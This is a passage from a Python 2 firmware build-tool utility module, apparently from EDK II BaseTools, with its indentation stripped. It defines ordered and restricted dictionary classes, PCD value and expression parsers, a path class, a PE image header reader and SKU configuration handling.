if key not in self._key_list:
self._key_list.append(key)
IterableUserDict.__setitem__(self, key, value)
## del operator
def __delitem__(self, key):
self._key_list.remove(key)
IterableUserDict.__delitem__(self, key)
## used in "for k in dict" loop to ensure the correct order
def __iter__(self):
return self.iterkeys()
## len() support
def __len__(self):
return len(self._key_list)
## "in" test support
def __contains__(self, key):
return key in self._key_list
## indexof support
def index(self, key):
return self._key_list.index(key)
## insert support
def insert(self, key, newkey, newvalue, order):
index = self._key_list.index(key)
if order == 'BEFORE':
self._key_list.insert(index, newkey)
IterableUserDict.__setitem__(self, newkey, newvalue)
elif order == 'AFTER':
self._key_list.insert(index + 1, newkey)
IterableUserDict.__setitem__(self, newkey, newvalue)
## append support
def append(self, sdict):
for key in sdict:
if key not in self._key_list:
self._key_list.append(key)
IterableUserDict.__setitem__(self, key, sdict[key])
def has_key(self, key):
return key in self._key_list
## Empty the dict
def clear(self):
self._key_list = []
IterableUserDict.clear(self)
## Return a copy of keys
def keys(self):
keys = []
for key in self._key_list:
keys.append(key)
return keys
## Return a copy of values
def values(self):
values = []
for key in self._key_list:
values.append(self[key])
return values
## Return a copy of (key, value) list
def items(self):
items = []
for key in self._key_list:
items.append((key, self[key]))
return items
## Iteration support
def iteritems(self):
return iter(self.items())
## Keys interation support
def iterkeys(self):
return iter(self.keys())
## Values interation support
def itervalues(self):
return iter(self.values())
## Return value related to a key, and remove the (key, value) from the dict
def pop(self, key, *dv):
value = None
if key in self._key_list:
value = self[key]
self.__delitem__(key)
elif len(dv) != 0 :
value = kv[0]
return value
## Return (key, value) pair, and remove the (key, value) from the dict
def popitem(self):
key = self._key_list[-1]
value = self[key]
self.__delitem__(key)
return key, value
def update(self, dict=None, **kwargs):
if dict != None:
for k, v in dict.items():
self[k] = v
if len(kwargs):
for k, v in kwargs.items():
self[k] = v
## Dictionary with restricted keys
#
class rdict(dict):
## Constructor
def __init__(self, KeyList):
for Key in KeyList:
dict.__setitem__(self, Key, "")
## []= operator
def __setitem__(self, key, value):
if key not in self:
EdkLogger.error("RestrictedDict", ATTRIBUTE_SET_FAILURE, "Key [%s] is not allowed" % key,
ExtraData=", ".join(dict.keys(self)))
dict.__setitem__(self, key, value)
## =[] operator
def __getitem__(self, key):
if key not in self:
return ""
return dict.__getitem__(self, key)
## del operator
def __delitem__(self, key):
EdkLogger.error("RestrictedDict", ATTRIBUTE_ACCESS_DENIED, ExtraData="del")
## Empty the dict
def clear(self):
for Key in self:
self.__setitem__(Key, "")
## Return value related to a key, and remove the (key, value) from the dict
def pop(self, key, *dv):
EdkLogger.error("RestrictedDict", ATTRIBUTE_ACCESS_DENIED, ExtraData="pop")
## Return (key, value) pair, and remove the (key, value) from the dict
def popitem(self):
EdkLogger.error("RestrictedDict", ATTRIBUTE_ACCESS_DENIED, ExtraData="popitem")
## Dictionary using prioritized list as key
#
class tdict:
_ListType = type([])
_TupleType = type(())
_Wildcard = 'COMMON'
_ValidWildcardList = ['COMMON', 'DEFAULT', 'ALL', '*', 'PLATFORM']
def __init__(self, _Single_=False, _Level_=2):
self._Level_ = _Level_
self.data = {}
self._Single_ = _Single_
# =[] operator
def __getitem__(self, key):
KeyType = type(key)
RestKeys = None
if KeyType == self._ListType or KeyType == self._TupleType:
FirstKey = key[0]
if len(key) > 1:
RestKeys = key[1:]
elif self._Level_ > 1:
RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
else:
FirstKey = key
if self._Level_ > 1:
RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
if FirstKey == None or str(FirstKey).upper() in self._ValidWildcardList:
FirstKey = self._Wildcard
if self._Single_:
return self._GetSingleValue(FirstKey, RestKeys)
else:
return self._GetAllValues(FirstKey, RestKeys)
def _GetSingleValue(self, FirstKey, RestKeys):
Value = None
#print "%s-%s" % (FirstKey, self._Level_) ,
if self._Level_ > 1:
if FirstKey == self._Wildcard:
if FirstKey in self.data:
Value = self.data[FirstKey][RestKeys]
if Value == None:
for Key in self.data:
Value = self.data[Key][RestKeys]
if Value != None: break
else:
if FirstKey in self.data:
Value = self.data[FirstKey][RestKeys]
if Value == None and self._Wildcard in self.data:
#print "Value=None"
Value = self.data[self._Wildcard][RestKeys]
else:
if FirstKey == self._Wildcard:
if FirstKey in self.data:
Value = self.data[FirstKey]
if Value == None:
for Key in self.data:
Value = self.data[Key]
if Value != None: break
else:
if FirstKey in self.data:
Value = self.data[FirstKey]
elif self._Wildcard in self.data:
Value = self.data[self._Wildcard]
return Value
def _GetAllValues(self, FirstKey, RestKeys):
Value = []
if self._Level_ > 1:
if FirstKey == self._Wildcard:
for Key in self.data:
Value += self.data[Key][RestKeys]
else:
if FirstKey in self.data:
Value += self.data[FirstKey][RestKeys]
if self._Wildcard in self.data:
Value += self.data[self._Wildcard][RestKeys]
else:
if FirstKey == self._Wildcard:
for Key in self.data:
Value.append(self.data[Key])
else:
if FirstKey in self.data:
Value.append(self.data[FirstKey])
if self._Wildcard in self.data:
Value.append(self.data[self._Wildcard])
return Value
## []= operator
def __setitem__(self, key, value):
KeyType = type(key)
RestKeys = None
if KeyType == self._ListType or KeyType == self._TupleType:
FirstKey = key[0]
if len(key) > 1:
RestKeys = key[1:]
else:
RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
else:
FirstKey = key
if self._Level_ > 1:
RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
if FirstKey in self._ValidWildcardList:
FirstKey = self._Wildcard
if FirstKey not in self.data and self._Level_ > 0:
self.data[FirstKey] = tdict(self._Single_, self._Level_ - 1)
if self._Level_ > 1:
self.data[FirstKey][RestKeys] = value
else:
self.data[FirstKey] = value
def SetGreedyMode(self):
self._Single_ = False
if self._Level_ > 1:
for Key in self.data:
self.data[Key].SetGreedyMode()
def SetSingleMode(self):
self._Single_ = True
if self._Level_ > 1:
for Key in self.data:
self.data[Key].SetSingleMode()
def GetKeys(self, KeyIndex=0):
assert KeyIndex >= 0
if KeyIndex == 0:
return set(self.data.keys())
else:
keys = set()
for Key in self.data:
keys |= self.data[Key].GetKeys(KeyIndex - 1)
return keys
## Boolean chain list
#
class Blist(UserList):
def __init__(self, initlist=None):
UserList.__init__(self, initlist)
def __setitem__(self, i, item):
if item not in [True, False]:
if item == 0:
item = False
else:
item = True
self.data[i] = item
def _GetResult(self):
Value = True
for item in self.data:
Value &= item
return Value
Result = property(_GetResult)
def ParseConsoleLog(Filename):
Opr = open(os.path.normpath(Filename), 'r')
Opw = open(os.path.normpath(Filename + '.New'), 'w+')
for Line in Opr.readlines():
if Line.find('.efi') > -1:
Line = Line[Line.rfind(' ') : Line.rfind('.efi')].strip()
Opw.write('%s\n' % Line)
Opr.close()
Opw.close()
def AnalyzePcdExpression(Setting):
Setting = Setting.strip()
# There might be escaped quote in a string: \", \\\"
Data = Setting.replace('\\\\', '//').replace('\\\"', '\\\'')
# There might be '|' in string and in ( ... | ... ), replace it with '-'
NewStr = ''
InStr = False
Pair = 0
for ch in Data:
if ch == '"':
InStr = not InStr
elif ch == '(' and not InStr:
Pair += 1
elif ch == ')' and not InStr:
Pair -= 1
if (Pair > 0 or InStr) and ch == TAB_VALUE_SPLIT:
NewStr += '-'
else:
NewStr += ch
FieldList = []
StartPos = 0
while True:
Pos = NewStr.find(TAB_VALUE_SPLIT, StartPos)
if Pos < 0:
FieldList.append(Setting[StartPos:].strip())
break
FieldList.append(Setting[StartPos:Pos].strip())
StartPos = Pos + 1
return FieldList
def ParseDevPathValue (Value):
pass
def ParseFieldValue (Value):
if type(Value) == type(0):
return Value, (Value.bit_length() + 7) / 8
if type(Value) <> type(''):
raise BadExpression('Type %s is %s' %(Value, type(Value)))
Value = Value.strip()
if Value.startswith('UINT8') and Value.endswith(')'):
Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
if Size > 1:
raise BadExpression('Value (%s) Size larger than %d' %(Value, Size))
return Value, 1
if Value.startswith('UINT16') and Value.endswith(')'):
Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
if Size > 2:
raise BadExpression('Value (%s) Size larger than %d' %(Value, Size))
return Value, 2
if Value.startswith('UINT32') and Value.endswith(')'):
Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
if Size > 4:
raise BadExpression('Value (%s) Size larger than %d' %(Value, Size))
return Value, 4
if Value.startswith('UINT64') and Value.endswith(')'):
Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
if Size > 8:
raise BadExpression('Value (%s) Size larger than %d' % (Value, Size))
return Value, 8
if Value.startswith('GUID') and Value.endswith(')'):
Value = Value.split('(', 1)[1][:-1].strip()
if Value[0] == '{' and Value[-1] == '}':
Value = Value[1:-1].strip()
Value = Value.split('{', 1)
Value = ['%02x' % int(Item, 16) for Item in (Value[0] + Value[1][:-1]).split(',')]
if len(Value[0]) != 8:
Value[0] = '%08X' % int(Value[0], 16)
if len(Value[1]) != 4:
Value[1] = '%04X' % int(Value[1], 16)
if len(Value[2]) != 4:
Value[2] = '%04X' % int(Value[2], 16)
Value = '-'.join(Value[0:3]) + '-' + ''.join(Value[3:5]) + '-' + ''.join(Value[5:11])
if Value[0] == '"' and Value[-1] == '"':
Value = Value[1:-1]
try:
Value = "'" + uuid.UUID(Value).get_bytes_le() + "'"
except ValueError, Message:
raise BadExpression('%s' % Message)
Value, Size = ParseFieldValue(Value)
return Value, 16
if Value.startswith('L"') and Value.endswith('"'):
# Unicode String
List = list(Value[2:-1])
List.reverse()
Value = 0
for Char in List:
Value = (Value << 16) | ord(Char)
return Value, (len(List) + 1) * 2
if Value.startswith('"') and Value.endswith('"'):
# ASCII String
List = list(Value[1:-1])
List.reverse()
Value = 0
for Char in List:
Value = (Value << 8) | ord(Char)
return Value, len(List) + 1
if Value.startswith("L'") and Value.endswith("'"):
# Unicode Character Constant
List = list(Value[2:-1])
List.reverse()
Value = 0
for Char in List:
Value = (Value << 16) | ord(Char)
return Value, len(List) * 2
if Value.startswith("'") and Value.endswith("'"):
# Character constant
List = list(Value[1:-1])
List.reverse()
Value = 0
for Char in List:
Value = (Value << 8) | ord(Char)
return Value, len(List)
if Value.startswith('{') and Value.endswith('}'):
# Byte array
Value = Value[1:-1]
List = [Item.strip() for Item in Value.split(',')]
List.reverse()
Value = 0
RetSize = 0
for Item in List:
ItemValue, Size = ParseFieldValue(Item)
RetSize += Size
for I in range(Size):
Value = (Value << 8) | ((ItemValue >> 8 * I) & 0xff)
return Value, RetSize
if Value.startswith('DEVICE_PATH(') and Value.endswith(')'):
Value = Value.split('"')[1]
return ParseDevPathValue(Value)
if Value.lower().startswith('0x'):
Value = int(Value, 16)
if Value == 0:
return 0, 1
return Value, (Value.bit_length() + 7) / 8
if Value[0].isdigit():
Value = int(Value, 10)
if Value == 0:
return 0, 1
return Value, (Value.bit_length() + 7) / 8
if Value.lower() == 'true':
return 1, 1
if Value.lower() == 'false':
return 0, 1
return Value, 1
## AnalyzeDscPcd
#
# Analyze DSC PCD value, since there is no data type info in DSC
# This fuction is used to match functions (AnalyzePcdData, AnalyzeHiiPcdData, AnalyzeVpdPcdData) used for retrieving PCD value from database
# 1. Feature flag: TokenSpace.PcdCName|PcdValue
# 2. Fix and Patch:TokenSpace.PcdCName|PcdValue[|MaxSize]
# 3. Dynamic default:
# TokenSpace.PcdCName|PcdValue[|VOID*[|MaxSize]]
# TokenSpace.PcdCName|PcdValue
# 4. Dynamic VPD:
# TokenSpace.PcdCName|VpdOffset[|VpdValue]
# TokenSpace.PcdCName|VpdOffset[|MaxSize[|VpdValue]]
# 5. Dynamic HII:
# TokenSpace.PcdCName|HiiString|VaiableGuid|VariableOffset[|HiiValue]
# PCD value needs to be located in such kind of string, and the PCD value might be an expression in which
# there might have "|" operator, also in string value.
#
# @param Setting: String contain information described above with "TokenSpace.PcdCName|" stripped
# @param PcdType: PCD type: feature, fixed, dynamic default VPD HII
# @param DataType: The datum type of PCD: VOID*, UNIT, BOOL
# @retval:
# ValueList: A List contain fields described above
# IsValid: True if conforming EBNF, otherwise False
# Index: The index where PcdValue is in ValueList
#
def AnalyzeDscPcd(Setting, PcdType, DataType=''):
FieldList = AnalyzePcdExpression(Setting)
IsValid = True
if PcdType in (MODEL_PCD_FIXED_AT_BUILD, MODEL_PCD_PATCHABLE_IN_MODULE, MODEL_PCD_FEATURE_FLAG):
Value = FieldList[0]
Size = ''
if len(FieldList) > 1:
if FieldList[1].upper().startswith("0X") or FieldList[1].isdigit():
Size = FieldList[1]
else:
DataType = FieldList[1]
if len(FieldList) > 2:
Size = FieldList[2]
if DataType == "":
IsValid = (len(FieldList) <= 1)
else:
IsValid = (len(FieldList) <= 3)
# Value, Size = ParseFieldValue(Value)
if Size:
try:
int(Size,16) if Size.upper().startswith("0X") else int(Size)
except:
IsValid = False
Size = -1
return [str(Value), '', str(Size)], IsValid, 0
elif PcdType in (MODEL_PCD_DYNAMIC_DEFAULT, MODEL_PCD_DYNAMIC_EX_DEFAULT):
Value = FieldList[0]
Size = Type = ''
if len(FieldList) > 1:
Type = FieldList[1]
else:
Type = DataType
if len(FieldList) > 2:
Size = FieldList[2]
else:
if Type == 'VOID*':
if Value.startswith("L"):
Size = str((len(Value)- 3 + 1) * 2)
elif Value.startswith("{"):
Size = str(len(Value.split(",")))
else:
Size = str(len(Value) -2 + 1 )
if DataType == "":
IsValid = (len(FieldList) <= 1)
else:
IsValid = (len(FieldList) <= 3)
if Size:
try:
int(Size,16) if Size.upper().startswith("0X") else int(Size)
except:
IsValid = False
Size = -1
return [Value, Type, str(Size)], IsValid, 0
elif PcdType in (MODEL_PCD_DYNAMIC_VPD, MODEL_PCD_DYNAMIC_EX_VPD):
VpdOffset = FieldList[0]
Value = Size = ''
if not DataType == 'VOID*':
if len(FieldList) > 1:
Value = FieldList[1]
else:
if len(FieldList) > 1:
Size = FieldList[1]
if len(FieldList) > 2:
Value = FieldList[2]
if DataType == "":
IsValid = (len(FieldList) <= 1)
else:
IsValid = (len(FieldList) <= 3)
if Size:
try:
int(Size,16) if Size.upper().startswith("0X") else int(Size)
except:
IsValid = False
Size = -1
return [VpdOffset, str(Size), Value], IsValid, 2
elif PcdType in (MODEL_PCD_DYNAMIC_HII, MODEL_PCD_DYNAMIC_EX_HII):
HiiString = FieldList[0]
Guid = Offset = Value = Attribute = ''
if len(FieldList) > 1:
Guid = FieldList[1]
if len(FieldList) > 2:
Offset = FieldList[2]
if len(FieldList) > 3:
Value = FieldList[3]
if len(FieldList) > 4:
Attribute = FieldList[4]
IsValid = (3 <= len(FieldList) <= 5)
return [HiiString, Guid, Offset, Value, Attribute], IsValid, 3
return [], False, 0
## AnalyzePcdData
#
# Analyze the pcd Value, Datum type and TokenNumber.
# Used to avoid split issue while the value string contain "|" character
#
# @param[in] Setting: A String contain value/datum type/token number information;
#
# @retval ValueList: A List contain value, datum type and toke number.
#
def AnalyzePcdData(Setting):
ValueList = ['', '', '']
ValueRe = re.compile(r'^\s*L?\".*\|.*\"')
PtrValue = ValueRe.findall(Setting)
ValueUpdateFlag = False
if len(PtrValue) >= 1:
Setting = re.sub(ValueRe, '', Setting)
ValueUpdateFlag = True
TokenList = Setting.split(TAB_VALUE_SPLIT)
ValueList[0:len(TokenList)] = TokenList
if ValueUpdateFlag:
ValueList[0] = PtrValue[0]
return ValueList
## AnalyzeHiiPcdData
#
# Analyze the pcd Value, variable name, variable Guid and variable offset.
# Used to avoid split issue while the value string contain "|" character
#
# @param[in] Setting: A String contain VariableName, VariableGuid, VariableOffset, DefaultValue information;
#
# @retval ValueList: A List contaian VariableName, VariableGuid, VariableOffset, DefaultValue.
#
def AnalyzeHiiPcdData(Setting):
ValueList = ['', '', '', '']
TokenList = GetSplitValueList(Setting)
ValueList[0:len(TokenList)] = TokenList
return ValueList
## AnalyzeVpdPcdData
#
# Analyze the vpd pcd VpdOffset, MaxDatumSize and InitialValue.
# Used to avoid split issue while the value string contain "|" character
#
# @param[in] Setting: A String contain VpdOffset/MaxDatumSize/InitialValue information;
#
# @retval ValueList: A List contain VpdOffset, MaxDatumSize and InitialValue.
#
def AnalyzeVpdPcdData(Setting):
ValueList = ['', '', '']
ValueRe = re.compile(r'\s*L?\".*\|.*\"\s*$')
PtrValue = ValueRe.findall(Setting)
ValueUpdateFlag = False
if len(PtrValue) >= 1:
Setting = re.sub(ValueRe, '', Setting)
ValueUpdateFlag = True
TokenList = Setting.split(TAB_VALUE_SPLIT)
ValueList[0:len(TokenList)] = TokenList
if ValueUpdateFlag:
ValueList[2] = PtrValue[0]
return ValueList
## check format of PCD value against its the datum type
#
# For PCD value setting
#
def CheckPcdDatum(Type, Value):
if Type == "VOID*":
ValueRe = re.compile(r'\s*L?\".*\"\s*$')
if not (((Value.startswith('L"') or Value.startswith('"')) and Value.endswith('"'))
or (Value.startswith('{') and Value.endswith('}'))
):
return False, "Invalid value [%s] of type [%s]; must be in the form of {...} for array"\
", or \"...\" for string, or L\"...\" for unicode string" % (Value, Type)
elif ValueRe.match(Value):
# Check the chars in UnicodeString or CString is printable
if Value.startswith("L"):
Value = Value[2:-1]
else:
Value = Value[1:-1]
Printset = set(string.printable)
Printset.remove(TAB_PRINTCHAR_VT)
Printset.add(TAB_PRINTCHAR_BS)
Printset.add(TAB_PRINTCHAR_NUL)
if not set(Value).issubset(Printset):
PrintList = list(Printset)
PrintList.sort()
return False, "Invalid PCD string value of type [%s]; must be printable chars %s." % (Type, PrintList)
elif Type == 'BOOLEAN':
if Value not in ['TRUE', 'True', 'true', '0x1', '0x01', '1', 'FALSE', 'False', 'false', '0x0', '0x00', '0']:
return False, "Invalid value [%s] of type [%s]; must be one of TRUE, True, true, 0x1, 0x01, 1"\
", FALSE, False, false, 0x0, 0x00, 0" % (Value, Type)
elif Type in [TAB_UINT8, TAB_UINT16, TAB_UINT32, TAB_UINT64]:
try:
Value = long(Value, 0)
except:
return False, "Invalid value [%s] of type [%s];"\
" must be a hexadecimal, decimal or octal in C language format." % (Value, Type)
else:
return True, "StructurePcd"
return True, ""
## Split command line option string to list
#
# subprocess.Popen needs the args to be a sequence. Otherwise there's problem
# in non-windows platform to launch command
#
def SplitOption(OptionString):
OptionList = []
LastChar = " "
OptionStart = 0
QuotationMark = ""
for Index in range(0, len(OptionString)):
CurrentChar = OptionString[Index]
if CurrentChar in ['"', "'"]:
if QuotationMark == CurrentChar:
QuotationMark = ""
elif QuotationMark == "":
QuotationMark = CurrentChar
continue
elif QuotationMark:
continue
if CurrentChar in ["/", "-"] and LastChar in [" ", "\t", "\r", "\n"]:
if Index > OptionStart:
OptionList.append(OptionString[OptionStart:Index - 1])
OptionStart = Index
LastChar = CurrentChar
OptionList.append(OptionString[OptionStart:])
return OptionList
def CommonPath(PathList):
P1 = min(PathList).split(os.path.sep)
P2 = max(PathList).split(os.path.sep)
for Index in xrange(min(len(P1), len(P2))):
if P1[Index] != P2[Index]:
return os.path.sep.join(P1[:Index])
return os.path.sep.join(P1)
#
# Convert string to C format array
#
def ConvertStringToByteArray(Value):
Value = Value.strip()
if not Value:
return None
if Value[0] == '{':
if not Value.endswith('}'):
return None
Value = Value.replace(' ', '').replace('{', '').replace('}', '')
ValFields = Value.split(',')
try:
for Index in range(len(ValFields)):
ValFields[Index] = str(int(ValFields[Index], 0))
except ValueError:
return None
Value = '{' + ','.join(ValFields) + '}'
return Value
Unicode = False
if Value.startswith('L"'):
if not Value.endswith('"'):
return None
Value = Value[1:]
Unicode = True
elif not Value.startswith('"') or not Value.endswith('"'):
return None
Value = eval(Value) # translate escape character
NewValue = '{'
for Index in range(0,len(Value)):
if Unicode:
NewValue = NewValue + str(ord(Value[Index]) % 0x10000) + ','
else:
NewValue = NewValue + str(ord(Value[Index]) % 0x100) + ','
Value = NewValue + '0}'
return Value
class PathClass(object):
def __init__(self, File='', Root='', AlterRoot='', Type='', IsBinary=False,
Arch='COMMON', ToolChainFamily='', Target='', TagName='', ToolCode=''):
self.Arch = Arch
self.File = str(File)
if os.path.isabs(self.File):
self.Root = ''
self.AlterRoot = ''
else:
self.Root = str(Root)
self.AlterRoot = str(AlterRoot)
# Remove any '.' and '..' in path
if self.Root:
self.Root = mws.getWs(self.Root, self.File)
self.Path = os.path.normpath(os.path.join(self.Root, self.File))
self.Root = os.path.normpath(CommonPath([self.Root, self.Path]))
# eliminate the side-effect of 'C:'
if self.Root[-1] == ':':
self.Root += os.path.sep
# file path should not start with path separator
if self.Root[-1] == os.path.sep:
self.File = self.Path[len(self.Root):]
else:
self.File = self.Path[len(self.Root) + 1:]
else:
self.Path = os.path.normpath(self.File)
self.SubDir, self.Name = os.path.split(self.File)
self.BaseName, self.Ext = os.path.splitext(self.Name)
if self.Root:
if self.SubDir:
self.Dir = os.path.join(self.Root, self.SubDir)
else:
self.Dir = self.Root
else:
self.Dir = self.SubDir
if IsBinary:
self.Type = Type
else:
self.Type = self.Ext.lower()
self.IsBinary = IsBinary
self.Target = Target
self.TagName = TagName
self.ToolCode = ToolCode
self.ToolChainFamily = ToolChainFamily
self._Key = None
## Convert the object of this class to a string
#
# Convert member Path of the class to a string
#
# @retval string Formatted String
#
def __str__(self):
return self.Path
## Override __eq__ function
#
# Check whether PathClass are the same
#
# @retval False The two PathClass are different
# @retval True The two PathClass are the same
#
def __eq__(self, Other):
if type(Other) == type(self):
return self.Path == Other.Path
else:
return self.Path == str(Other)
## Override __cmp__ function
#
# Customize the comparsion operation of two PathClass
#
# @retval 0 The two PathClass are different
# @retval -1 The first PathClass is less than the second PathClass
# @retval 1 The first PathClass is Bigger than the second PathClass
def __cmp__(self, Other):
if type(Other) == type(self):
OtherKey = Other.Path
else:
OtherKey = str(Other)
SelfKey = self.Path
if SelfKey == OtherKey:
return 0
elif SelfKey > OtherKey:
return 1
else:
return -1
## Override __hash__ function
#
# Use Path as key in hash table
#
# @retval string Key for hash table
#
def __hash__(self):
return hash(self.Path)
def _GetFileKey(self):
if self._Key == None:
self._Key = self.Path.upper() # + self.ToolChainFamily + self.TagName + self.ToolCode + self.Target
return self._Key
def _GetTimeStamp(self):
return os.stat(self.Path)[8]
def Validate(self, Type='', CaseSensitive=True):
if GlobalData.gCaseInsensitive:
CaseSensitive = False
if Type and Type.lower() != self.Type:
return FILE_TYPE_MISMATCH, '%s (expect %s but got %s)' % (self.File, Type, self.Type)
RealFile, RealRoot = RealPath2(self.File, self.Root, self.AlterRoot)
if not RealRoot and not RealFile:
RealFile = self.File
if self.AlterRoot:
RealFile = os.path.join(self.AlterRoot, self.File)
elif self.Root:
RealFile = os.path.join(self.Root, self.File)
if len (mws.getPkgPath()) == 0:
return FILE_NOT_FOUND, os.path.join(self.AlterRoot, RealFile)
else:
return FILE_NOT_FOUND, "%s is not found in packages path:\n\t%s" % (self.File, '\n\t'.join(mws.getPkgPath()))
ErrorCode = 0
ErrorInfo = ''
if RealRoot != self.Root or RealFile != self.File:
if CaseSensitive and (RealFile != self.File or (RealRoot != self.Root and RealRoot != self.AlterRoot)):
ErrorCode = FILE_CASE_MISMATCH
ErrorInfo = self.File + '\n\t' + RealFile + " [in file system]"
self.SubDir, self.Name = os.path.split(RealFile)
self.BaseName, self.Ext = os.path.splitext(self.Name)
if self.SubDir:
self.Dir = os.path.join(RealRoot, self.SubDir)
else:
self.Dir = RealRoot
self.File = RealFile
self.Root = RealRoot
self.Path = os.path.join(RealRoot, RealFile)
return ErrorCode, ErrorInfo
Key = property(_GetFileKey)
TimeStamp = property(_GetTimeStamp)
## Parse PE image to get the required PE informaion.
#
class PeImageClass():
## Constructor
#
# @param File FilePath of PeImage
#
def __init__(self, PeFile):
self.FileName = PeFile
self.IsValid = False
self.Size = 0
self.EntryPoint = 0
self.SectionAlignment = 0
self.SectionHeaderList = []
self.ErrorInfo = ''
try:
PeObject = open(PeFile, 'rb')
except:
self.ErrorInfo = self.FileName + ' can not be found\n'
return
# Read DOS header
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 0x3E)
ByteList = ByteArray.tolist()
# DOS signature should be 'MZ'
if self._ByteListToStr (ByteList[0x0:0x2]) != 'MZ':
self.ErrorInfo = self.FileName + ' has no valid DOS signature MZ'
return
# Read 4 byte PE Signature
PeOffset = self._ByteListToInt(ByteList[0x3C:0x3E])
PeObject.seek(PeOffset)
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 4)
# PE signature should be 'PE\0\0'
if ByteArray.tostring() != 'PE\0\0':
self.ErrorInfo = self.FileName + ' has no valid PE signature PE00'
return
# Read PE file header
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 0x14)
ByteList = ByteArray.tolist()
SecNumber = self._ByteListToInt(ByteList[0x2:0x4])
if SecNumber == 0:
self.ErrorInfo = self.FileName + ' has no section header'
return
# Read PE optional header
OptionalHeaderSize = self._ByteListToInt(ByteArray[0x10:0x12])
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, OptionalHeaderSize)
ByteList = ByteArray.tolist()
self.EntryPoint = self._ByteListToInt(ByteList[0x10:0x14])
self.SectionAlignment = self._ByteListToInt(ByteList[0x20:0x24])
self.Size = self._ByteListToInt(ByteList[0x38:0x3C])
# Read each Section Header
for Index in range(SecNumber):
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 0x28)
ByteList = ByteArray.tolist()
SecName = self._ByteListToStr(ByteList[0:8])
SecVirtualSize = self._ByteListToInt(ByteList[8:12])
SecRawAddress = self._ByteListToInt(ByteList[20:24])
SecVirtualAddress = self._ByteListToInt(ByteList[12:16])
self.SectionHeaderList.append((SecName, SecVirtualAddress, SecRawAddress, SecVirtualSize))
self.IsValid = True
PeObject.close()
def _ByteListToStr(self, ByteList):
String = ''
for index in range(len(ByteList)):
if ByteList[index] == 0:
break
String += chr(ByteList[index])
return String
def _ByteListToInt(self, ByteList):
Value = 0
for index in range(len(ByteList) - 1, -1, -1):
Value = (Value << 8) | int(ByteList[index])
return Value
class DefaultStore():
def __init__(self,DefaultStores ):
self.DefaultStores = DefaultStores
def DefaultStoreID(self,DefaultStoreName):
for key,value in self.DefaultStores.items():
if value == DefaultStoreName:
return key
return None
def GetDefaultDefault(self):
if not self.DefaultStores or "0" in self.DefaultStores:
return "0",TAB_DEFAULT_STORES_DEFAULT
else:
minvalue = min([int(value_str) for value_str in self.DefaultStores.keys()])
return (str(minvalue), self.DefaultStores[str(minvalue)])
def GetMin(self,DefaultSIdList):
if not DefaultSIdList:
return "STANDARD"
storeidset = {storeid for storeid, storename in self.DefaultStores.values() if storename in DefaultSIdList}
if not storeidset:
return ""
minid = min(storeidset )
for sid,name in self.DefaultStores.values():
if sid == minid:
return name
class SkuClass():
DEFAULT = 0
SINGLE = 1
MULTIPLE =2
def __init__(self,SkuIdentifier='', SkuIds=None):
if SkuIds is None:
SkuIds = {}
for SkuName in SkuIds:
SkuId = SkuIds[SkuName][0]
skuid_num = int(SkuId,16) if SkuId.upper().startswith("0X") else int(SkuId)
if skuid_num > 0xFFFFFFFFFFFFFFFF:
EdkLogger.error("build", PARAMETER_INVALID,
ExtraData = "SKU-ID [%s] value %s exceeds the max value of UINT64"
% (SkuName, SkuId))
self.AvailableSkuIds = sdict()
self.SkuIdSet = []
self.SkuIdNumberSet = []
self.SkuData = SkuIds
self.__SkuInherit = {}
self.__SkuIdentifier = SkuIdentifier
if SkuIdentifier == '' or SkuIdentifier is None:
self.SkuIdSet = ['DEFAULT']
self.SkuIdNumberSet = ['0U']
elif SkuIdentifier == 'ALL':
self.SkuIdSet = SkuIds.keys()
self.SkuIdNumberSet = [num[0].strip() + 'U' for num in SkuIds.values()]
else:
r = SkuIdentifier.split('|')
self.SkuIdSet=[(r[k].strip()).upper() for k in range(len(r))]
k = None
try:
self.SkuIdNumberSet = [SkuIds[k][0].strip() + 'U' for k in self.SkuIdSet]
except Exception:
EdkLogger.error("build", PARAMETER_INVALID,
ExtraData = "SKU-ID [%s] is not supported by the platform. [Valid SKU-ID: %s]"
% (k, " | ".join(SkuIds.keys())))
for each in self.SkuIdSet:
if each in SkuIds:
self.AvailableSkuIds[each] = SkuIds[each][0]
else:
EdkLogger.error("build", PARAMETER_INVALID,
ExtraData="SKU-ID [%s] is not supported by the platform. [Valid SKU-ID: %s]"
% (each, " | ".join(SkuIds.keys())))
if self.SkuUsageType != self.SINGLE:
self.AvailableSkuIds.update({'DEFAULT':0, 'COMMON':0})
if self.SkuIdSet:
GlobalData.gSkuids = (self.SkuIdSet)
if 'COMMON' in GlobalData.gSkuids:
GlobalData.gSkuids.remove('COMMON')
if GlobalData.gSkuids:
GlobalData.gSkuids.sort()
def GetNextSkuId(self, skuname):
if not self.__SkuInherit:
self.__SkuInherit = {}
for item in self.SkuData.values():
self.__SkuInherit[item[1]]=item[2] if item[2] else "DEFAULT"
return self.__SkuInherit.get(skuname,"DEFAULT")
def GetSkuChain(self,sku):
skulist = [sku]
nextsku = sku
while 1:
nextsku = self.GetNextSkuId(nextsku)
skulist.append(nextsku)
if nextsku == "DEFAULT":
break
skulist.reverse()
return skulist
def SkuOverrideOrder(self):
skuorderset = []
for skuname in self.SkuIdSet:
skuorderset.append(self.GetSkuChain(skuname))
skuorder = []
for index in range(max([len(item) for item in skuorderset])):
for subset in skuorderset:
if index > len(subset)-1:
continue
if subset[index] in skuorder:
continue
skuorder.append(subset[index])
return skuorder
def __SkuUsageType(self):
if self.__SkuIdentifier.upper() == "ALL":
return SkuClass.MULTIPLE
if len(self.SkuIdSet) == 1:
if self.SkuIdSet[0] == 'DEFAULT':
return SkuClass.DEFAULT
else:
return SkuClass.SINGLE
elif len(self.SkuIdSet) == 2:
if 'DEFAULT' in self.SkuIdSet:
return SkuClass.SINGLE
else:
return SkuClass.MULTIPLE
else:
return SkuClass.MULTIPLE
def DumpSkuIdArrary(self):
ArrayStrList = []
